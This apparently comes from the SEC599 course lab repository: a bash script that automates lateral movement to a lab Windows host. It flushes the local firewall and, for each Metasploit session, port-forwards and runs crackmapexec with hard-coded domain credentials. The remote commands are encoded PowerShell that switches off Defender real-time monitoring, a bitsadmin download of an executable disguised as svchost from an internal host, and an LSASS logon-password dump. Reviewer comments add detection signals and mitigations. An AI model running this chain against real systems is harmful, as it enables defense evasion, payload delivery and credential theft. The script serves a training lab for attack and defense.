forked from NVISOsecurity/SEC599
4-movetowin01-FINAL.sh
#!/bin/bash
# SEC599 - DtF Script - Step 4 - Move laterally to Windows01
# Open this host's firewall for the lab run: flush every rule in the filter
# table, then insert an unconditional ACCEPT at the top of INPUT.
# Nothing in the visible script saves or restores the previous rule set, so the
# host keeps accepting all inbound traffic after the script ends.
printf '%s\n' "Clearing firewall rules (allow all inbound)"
printf '%s\n' "-------------------------------------------"
if iptables -F; then
  printf '%s\n' "OK - iptables flushed"
fi
if iptables -I INPUT -j ACCEPT; then
  printf '%s\n' "OK - all inbound allowed"
fi
printf '%s\n' "Done"
# Main loop: one iteration per line of 3-cms_backdoor_sessions_final (each line
# is used as a session id). Per iteration: render and submit a port-forward
# resource file, run four remote commands through 127.0.0.1 with a fixed domain
# account, then render and submit the matching "stop" resource file.
# NOTE(review): `read c` has no -r and no IFS=, so backslashes and leading or
# trailing whitespace in the input are altered before $c is used.
while read c; do
# Second whitespace-separated field of the line(s) starting with $c.
# NOTE(review): "^$c" is a regex prefix, not an exact match, so id 1 also
# matches 10, 11, ...; $ip then holds several lines. $ip is only used in the
# status messages below, never as a target.
ip=$(grep "^$c" /root/Desktop/CTF/output/3-metsessions_cms_backdoor_ip-final | awk -F ' ' '{print $2}')
echo ""
echo "Setting up portforward to Session $c - IP address $ip"
echo "-----------------------------------------------------"
# Fixed output path: the rendered .rc file is overwritten on every iteration.
cp /root/Desktop/CTF/4-portforwardtemplate /root/Desktop/CTF/4-portforward.rc
# $c is interpolated into the sed program; a value containing "/" or "&" would
# change the substitution. Template contents are not shown on this page.
sed -i "s/TEMPLATE/$c/g" /root/Desktop/CTF/4-portforward.rc
# Sends a "resource" command to whatever listens on 127.0.0.1:55554
# (presumably a console started by an earlier step; it is not set up in this file).
echo "resource /root/Desktop/CTF/4-portforward.rc" | nc 127.0.0.1 55554
echo "Use Dwight Schrute's credentials against Windows01 - Session $c - IP address $ip"
echo "--------------------------------------------------------------------------------"
# NOTE(review): domain, user name and password are hard-coded and passed on the
# command line in all four calls below, so they are readable in this file and in
# the local process list while each call runs.
# Disable Defender: the -Enc payload is UTF-16LE base64 for a Set-MpPreference
# call that turns real-time monitoring off. Defender-side signals: powershell.exe
# started with an encoded command, script block logging showing the decoded text,
# and Defender event 5001 (real-time protection disabled). Tamper protection,
# when enabled, blocks this change.
/usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u dwight.schrute -p BattleSt4r -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA='
# sleep 5
# Downloads an executable over plain HTTP with bitsadmin into the user's
# Downloads folder. The URL names svchost.exe, the destination svhost.exe; both
# imitate a system process name. Defender-side signals: "bitsadmin /transfer" on
# a command line, BITS client log entries, an .exe written under Downloads.
/usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u dwight.schrute -p BattleSt4r -x 'bitsadmin /transfer debjob /download /priority normal http://192.168.1.212:8080/svchost.exe C:\\Users\\dwight.schrute\\Downloads\\svhost.exe'
# The -Enc payload decodes to a "cmd /c" launch of the downloaded file with an
# argument that reads logon credentials from LSASS memory. Defender-side:
# LSASS process-access telemetry; LSA protection and Credential Guard are the
# usual mitigations.
/usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u dwight.schrute -p BattleSt4r -x 'powershell.exe -Enc YwBtAGQAIAAvAGMAIABDADoAXABcAFUAcwBlAHIAcwBcAFwAZAB3AGkAZwBoAHQALgBzAGMAaAByAHUAdABlAFwAXABEAG8AdwBuAGwAbwBhAGQAcwBcAFwAcwB2AGgAbwBzAHQALgBlAHgAZQAgAHMAZQBrAHUAcgBsAHMAYQA6ADoAbABvAGcAbwBuAFAAYQBzAHMAdwBvAHIAZABzACAAZQB4AGkAdAA='
# Enable Defender: same Set-MpPreference call with the value set back to false.
# It runs only if the loop body reaches this line; there is no trap, so an
# interrupted run leaves real-time monitoring off on the lab target.
/usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u dwight.schrute -p BattleSt4r -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAZgBhAGwAcwBlAA=='
echo "Done"
echo "Removing portforward to Session $c - IP address $ip"
echo "---------------------------------------------------"
# Teardown mirrors the setup: render the stop template for this session id and
# submit it to the same local listener.
cp /root/Desktop/CTF/4-stopportforwardtemplate /root/Desktop/CTF/4-stopportforward.rc
sed -i "s/TEMPLATE/$c/g" /root/Desktop/CTF/4-stopportforward.rc
echo "resource /root/Desktop/CTF/4-stopportforward.rc" | nc 127.0.0.1 55554
done </root/Desktop/CTF/output/3-cms_backdoor_sessions_final